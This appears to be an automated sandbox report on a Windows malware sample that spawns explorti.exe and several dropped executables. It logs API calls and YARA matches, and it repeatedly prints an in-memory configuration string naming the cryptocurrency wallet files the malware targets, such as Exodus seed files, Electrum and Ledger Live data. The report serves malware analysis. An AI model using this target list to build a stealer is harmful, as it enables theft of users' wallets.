Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe "C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe "C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe "C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe"
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB04760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 7_2_6CB04760
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 7_2_6C9E1C30
Source: 8eb30d7f71.exe, 00000009.00000002.2880216454.00000000005D2000.00000002.00000001.01000000.0000000B.sdmp, 8eb30d7f71.exe.6.dr, random[1].exe0.6.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: eb98fe5174.exe, eb98fe5174.exe, 00000007.00000002.2620268585.0000000000A2C000.00000040.00000001.01000000.00000009.sdmp, 53c7d901f1.exe, 00000008.00000002.2648279906.000000000085C000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: \Program Manager
Source: explorti.exe, explorti.exe, 00000006.00000002.2880337631.0000000000CE5000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: "Program Manager
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B0D312 cpuid 6_2_00B0D312
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B0CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00B0CB1A
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00AF65B0 LookupAccountNameA, 6_2_00AF65B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA08390 NSS_GetVersion, 7_2_6CA08390

Stealing of Sensitive Information

Source: Yara match File source: 1.2.explorti.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.explorti.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorti.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1731310939.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1724434181.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1644028798.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1725167725.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2316417057.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1765635278.0000000000AF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1764804694.0000000000AF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2880125068.0000000000AF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2639639180.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 53c7d901f1.exe PID: 7996, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1731373345.0000000000CE5000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: ^jaxxy
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2619375968.00000000006CA000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.jsonA
Source: eb98fe5174.exe, 00000007.00000002.2619375968.00000000006CA000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: file__0.localstorage
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*
Source: eb98fe5174.exe, 00000007.00000002.2619375968.00000000006CA000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: MultiDoge
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx 